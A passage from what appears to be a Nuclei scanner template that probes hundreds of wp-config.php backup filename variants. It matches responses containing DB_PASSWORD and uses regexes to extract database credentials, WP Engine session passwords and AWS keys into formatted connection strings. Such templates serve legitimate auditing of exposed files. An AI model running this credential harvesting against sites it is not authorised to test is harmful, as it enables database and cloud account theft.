#      - '{{BaseURL}}/wordpress/wp-config.php.maj'
#      - '{{BaseURL}}/wordpress/wp-config.php.new'
#      - '{{BaseURL}}/wordpress/wp-config.php.old'
#      - '{{BaseURL}}/wordpress/wp-config.php.org'
#      - '{{BaseURL}}/wordpress/wp-config.php.orig'
#      - '{{BaseURL}}/wordpress/wp-config.php.original'
#      - '{{BaseURL}}/wordpress/wp-config.php.php-bak'
#      - '{{BaseURL}}/wordpress/wp-config.php.prod'
#      - '{{BaseURL}}/wordpress/wp-config.php.production'
#      - '{{BaseURL}}/wordpress/wp-config.php.sample'
#      - '{{BaseURL}}/wordpress/wp-config.php.save'
#      - '{{BaseURL}}/wordpress/wp-config.php.save.1'
#      - '{{BaseURL}}/wordpress/wp-config.php.stage'
#      - '{{BaseURL}}/wordpress/wp-config.php.staging'
#      - '{{BaseURL}}/wordpress/wp-config.php.swn'
#      - '{{BaseURL}}/wordpress/wp-config.php.swo'
#      - '{{BaseURL}}/wordpress/wp-config.php.swordpress/wp'
#      - '{{BaseURL}}/wordpress/wp-config.php.tar'
#      - '{{BaseURL}}/wordpress/wp-config.php.temp'
#      - '{{BaseURL}}/wordpress/wp-config.php.tmp'
#      - '{{BaseURL}}/wordpress/wp-config.php.txt'
#      - '{{BaseURL}}/wordpress/wp-config.php.uk'
#      - '{{BaseURL}}/wordpress/wp-config.php.us'
#      - '{{BaseURL}}/wordpress/wp-config.php1'
#      - '{{BaseURL}}/wordpress/wp-config.php='
#      - '{{BaseURL}}/wordpress/wp-config.php_'
#      - '{{BaseURL}}/wordpress/wp-config.php_1'
#      - '{{BaseURL}}/wordpress/wp-config.php__'
#      - '{{BaseURL}}/wordpress/wp-config.php______'
#      - '{{BaseURL}}/wordpress/wp-config.php__olds'
#      - '{{BaseURL}}/wordpress/wp-config.php_backup'
#      - '{{BaseURL}}/wordpress/wp-config.php_bak'
#      - '{{BaseURL}}/wordpress/wp-config.php_bk'
#      - '{{BaseURL}}/wordpress/wp-config.php_new'
#      - '{{BaseURL}}/wordpress/wp-config.php_old'
#      - '{{BaseURL}}/wordpress/wp-config.php_old2017'
#      - '{{BaseURL}}/wordpress/wp-config.php_old2018'
#      - '{{BaseURL}}/wordpress/wp-config.php_old2019'
#      - '{{BaseURL}}/wordpress/wp-config.php_old2020'
#      - '{{BaseURL}}/wordpress/wp-config.php_orig'
#      - '{{BaseURL}}/wordpress/wp-config.php_original'
#      - '{{BaseURL}}/wordpress/wp-config.phpa'
#      - '{{BaseURL}}/wordpress/wp-config.phpb'
#      - '{{BaseURL}}/wordpress/wp-config.phpbak'
#      - '{{BaseURL}}/wordpress/wp-config.phpc'
#      - '{{BaseURL}}/wordpress/wp-config.phpd'
#      - '{{BaseURL}}/wordpress/wp-config.phpn'
#      - '{{BaseURL}}/wordpress/wp-config.phpnew'
#      - '{{BaseURL}}/wordpress/wp-config.phpold'
#      - '{{BaseURL}}/wordpress/wp-config.phporiginal'
#      - '{{BaseURL}}/wordpress/wp-config.phptmp'
#      - '{{BaseURL}}/wordpress/wp-config.php~'
#      - '{{BaseURL}}/wordpress/wp-config.php~~~'
#      - '{{BaseURL}}/wordpress/wp-config.prod.php.txt'
#      - '{{BaseURL}}/wordpress/wp-config.save'
#      - '{{BaseURL}}/wordpress/wp-config.tar'
#      - '{{BaseURL}}/wordpress/wp-config.temp'
#      - '{{BaseURL}}/wordpress/wp-config.txt'
#      - '{{BaseURL}}/wordpress/wp-config.zip'
#      - '{{BaseURL}}/wordpress/wp-config_backup'
#      - '{{BaseURL}}/wordpress/wp-config_good'
#      - '{{BaseURL}}/wordpress/wp-configbak'
#      - '{{BaseURL}}/wordpress/wp-config~'
#      - '{{BaseURL}}/wp/beta/wp-config.php'
#      - '{{BaseURL}}/wp/wp-config - Copy.php'
#      - '{{BaseURL}}/wp/wp-config copy.php'
#      - '{{BaseURL}}/wp/wp-config'
#      - '{{BaseURL}}/wp/wp-config-backup'
#      - '{{BaseURL}}/wp/wp-config-backup.php'
#      - '{{BaseURL}}/wp/wp-config-backup.txt'
#      - '{{BaseURL}}/wp/wp-config-backup1.txt'
#      - '{{BaseURL}}/wp/wp-config-good'
#      - '{{BaseURL}}/wp/wp-config-sample.php'
#      - '{{BaseURL}}/wp/wp-config-sample.php.bak'
#      - '{{BaseURL}}/wp/wp-config-sample.php~'
#      - '{{BaseURL}}/wp/wp-config.ORG'
#      - '{{BaseURL}}/wp/wp-config.backup'
#      - '{{BaseURL}}/wp/wp-config.bak'
#      - '{{BaseURL}}/wp/wp-config.bkp'
#      - '{{BaseURL}}/wp/wp-config.cfg'
#      - '{{BaseURL}}/wp/wp-config.conf'
#      - '{{BaseURL}}/wp/wp-config.data'
#      - '{{BaseURL}}/wp/wp-config.dump'
#      - '{{BaseURL}}/wp/wp-config.good'
#      - '{{BaseURL}}/wp/wp-config.htm'
#      - '{{BaseURL}}/wp/wp-config.html'
#      - '{{BaseURL}}/wp/wp-config.inc'
#      - '{{BaseURL}}/wp/wp-config.local.php'
#      - '{{BaseURL}}/wp/wp-config.old'
#      - '{{BaseURL}}/wp/wp-config.old.old'
#      - '{{BaseURL}}/wp/wp-config.orig'
#      - '{{BaseURL}}/wp/wp-config.original'
#      - '{{BaseURL}}/wp/wp-config.php'
#      - '{{BaseURL}}/wp/wp-config.php-'
#      - '{{BaseURL}}/wp/wp-config.php-backup'
#      - '{{BaseURL}}/wp/wp-config.php-bak'
#      - '{{BaseURL}}/wp/wp-config.php-n'
#      - '{{BaseURL}}/wp/wp-config.php-o'
#      - '{{BaseURL}}/wp/wp-config.php-old'
#      - '{{BaseURL}}/wp/wp-config.php-original'
#      - '{{BaseURL}}/wp/wp-config.php-save'
#      - '{{BaseURL}}/wp/wp-config.php-work'
#      - '{{BaseURL}}/wp/wp-config.php.0'
#      - '{{BaseURL}}/wp/wp-config.php.1'
#      - '{{BaseURL}}/wp/wp-config.php.2'
#      - '{{BaseURL}}/wp/wp-config.php.3'
#      - '{{BaseURL}}/wp/wp-config.php.4'
#      - '{{BaseURL}}/wp/wp-config.php.5'
#      - '{{BaseURL}}/wp/wp-config.php.6'
#      - '{{BaseURL}}/wp/wp-config.php.7'
#      - '{{BaseURL}}/wp/wp-config.php.8'
#      - '{{BaseURL}}/wp/wp-config.php.9'
#      - '{{BaseURL}}/wp/wp-config.php.a'
#      - '{{BaseURL}}/wp/wp-config.php.aws'
#      - '{{BaseURL}}/wp/wp-config.php.azure'
#      - '{{BaseURL}}/wp/wp-config.php.b'
#      - '{{BaseURL}}/wp/wp-config.php.backup'
#      - '{{BaseURL}}/wp/wp-config.php.backup.txt'
#      - '{{BaseURL}}/wp/wp-config.php.bak'
#      - '{{BaseURL}}/wp/wp-config.php.bak1'
#      - '{{BaseURL}}/wp/wp-config.php.bk'
#      - '{{BaseURL}}/wp/wp-config.php.bkp'
#      - '{{BaseURL}}/wp/wp-config.php.c'
#      - '{{BaseURL}}/wp/wp-config.php.com'
#      - '{{BaseURL}}/wp/wp-config.php.cust'
#      - '{{BaseURL}}/wp/wp-config.php.dev'
#      - '{{BaseURL}}/wp/wp-config.php.disabled'
#      - '{{BaseURL}}/wp/wp-config.php.dist'
#      - '{{BaseURL}}/wp/wp-config.php.dump'
#      - '{{BaseURL}}/wp/wp-config.php.html'
#      - '{{BaseURL}}/wp/wp-config.php.in'
#      - '{{BaseURL}}/wp/wp-config.php.inc'
#      - '{{BaseURL}}/wp/wp-config.php.local'
#      - '{{BaseURL}}/wp/wp-config.php.maj'
#      - '{{BaseURL}}/wp/wp-config.php.new'
#      - '{{BaseURL}}/wp/wp-config.php.old'
#      - '{{BaseURL}}/wp/wp-config.php.org'
#      - '{{BaseURL}}/wp/wp-config.php.orig'
#      - '{{BaseURL}}/wp/wp-config.php.original'
#      - '{{BaseURL}}/wp/wp-config.php.php-bak'
#      - '{{BaseURL}}/wp/wp-config.php.prod'
#      - '{{BaseURL}}/wp/wp-config.php.production'
#      - '{{BaseURL}}/wp/wp-config.php.sample'
#      - '{{BaseURL}}/wp/wp-config.php.save'
#      - '{{BaseURL}}/wp/wp-config.php.save.1'
#      - '{{BaseURL}}/wp/wp-config.php.stage'
#      - '{{BaseURL}}/wp/wp-config.php.staging'
#      - '{{BaseURL}}/wp/wp-config.php.swn'
#      - '{{BaseURL}}/wp/wp-config.php.swo'
#      - '{{BaseURL}}/wp/wp-config.php.swp/wp'
#      - '{{BaseURL}}/wp/wp-config.php.tar'
#      - '{{BaseURL}}/wp/wp-config.php.temp'
#      - '{{BaseURL}}/wp/wp-config.php.tmp'
#      - '{{BaseURL}}/wp/wp-config.php.txt'
#      - '{{BaseURL}}/wp/wp-config.php.uk'
#      - '{{BaseURL}}/wp/wp-config.php.us'
#      - '{{BaseURL}}/wp/wp-config.php1'
#      - '{{BaseURL}}/wp/wp-config.php='
#      - '{{BaseURL}}/wp/wp-config.php_'
#      - '{{BaseURL}}/wp/wp-config.php_1'
#      - '{{BaseURL}}/wp/wp-config.php__'
#      - '{{BaseURL}}/wp/wp-config.php______'
#      - '{{BaseURL}}/wp/wp-config.php__olds'
#      - '{{BaseURL}}/wp/wp-config.php_backup'
#      - '{{BaseURL}}/wp/wp-config.php_bak'
#      - '{{BaseURL}}/wp/wp-config.php_bk'
#      - '{{BaseURL}}/wp/wp-config.php_new'
#      - '{{BaseURL}}/wp/wp-config.php_old'
#      - '{{BaseURL}}/wp/wp-config.php_old2017'
#      - '{{BaseURL}}/wp/wp-config.php_old2018'
#      - '{{BaseURL}}/wp/wp-config.php_old2019'
#      - '{{BaseURL}}/wp/wp-config.php_old2020'
#      - '{{BaseURL}}/wp/wp-config.php_orig'
#      - '{{BaseURL}}/wp/wp-config.php_original'
#      - '{{BaseURL}}/wp/wp-config.phpa'
#      - '{{BaseURL}}/wp/wp-config.phpb'
#      - '{{BaseURL}}/wp/wp-config.phpbak'
#      - '{{BaseURL}}/wp/wp-config.phpc'
#      - '{{BaseURL}}/wp/wp-config.phpd'
#      - '{{BaseURL}}/wp/wp-config.phpn'
#      - '{{BaseURL}}/wp/wp-config.phpnew'
#      - '{{BaseURL}}/wp/wp-config.phpold'
#      - '{{BaseURL}}/wp/wp-config.phporiginal'
#      - '{{BaseURL}}/wp/wp-config.phptmp'
#      - '{{BaseURL}}/wp/wp-config.php~'
#      - '{{BaseURL}}/wp/wp-config.php~~~'
#      - '{{BaseURL}}/wp/wp-config.prod.php.txt'
#      - '{{BaseURL}}/wp/wp-config.save'
#      - '{{BaseURL}}/wp/wp-config.tar'
#      - '{{BaseURL}}/wp/wp-config.temp'
#      - '{{BaseURL}}/wp/wp-config.txt'
#      - '{{BaseURL}}/wp/wp-config.zip'
#      - '{{BaseURL}}/wp/wp-config_backup'
#      - '{{BaseURL}}/wp/wp-config_good'
#      - '{{BaseURL}}/wp/wp-configbak'
#      - '{{BaseURL}}/wp/wp-config~'    
#dop

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "DB_PASSWORD")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        dsl:
          - 'contains_all(body, "DB_ENGINE", "DB_PASSWORD")'
          - 'status_code == 200'
        condition: and

  #===EXTRACT-PART===#

    extractors:
      - type: regex
        part: body
        name: db_host        
        group: 6
        internal: true
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB|DATABASE)_(HOST|HOSTNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_name        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB|DATABASE)_(NAME|DATABASE)['\"](.*?).*?['\"](.*?)['\"]"          
      - type: regex
        part: body
        name: db_user        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB|DATABASE)_(USER|USERNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_password        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB|DATABASE)_(PASS|PASSWORD)['\"](.*?).*?['\"](.*?)['\"]"

      - type: regex
        part: body
        name: db_host
        group: 1  
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_HOST\\s*['\"][=:]['\"]\\s*(.*?)\\,"
          
      - type: regex
        part: body
        name: db_user
        group: 1
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_USERNAME\\s*['\"][=:]['\"]\\s*(.*?)\\,"

      - type: regex
        part: body
        name: db_password
        group: 1
        internal: true
        regex:   
          - "(?mi)['\"]WPENGINE_SESSION_DB_PASSWORD\\s*['\"][=:]['\"]\\s*(.*?)\\,"

      - type: regex
        part: body
        name: aws_key
        regex:
          - "((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})"

      - type: regex
        part: body
        name: aws_sec
        regex:
          - "secret-access-key\'\\s*=>(.*?)"


      - type: dsl  # type of the extractor
        name: db_cred
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + "3306" + "|DB_USERNAME=" + db_user + "|DB_PASSWORD=" + db_password'

      - type: dsl
        name: db_original
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + db_port + "|DB_USERNAME=" +  db_user + "|DB_PASSWORD=" + db_password'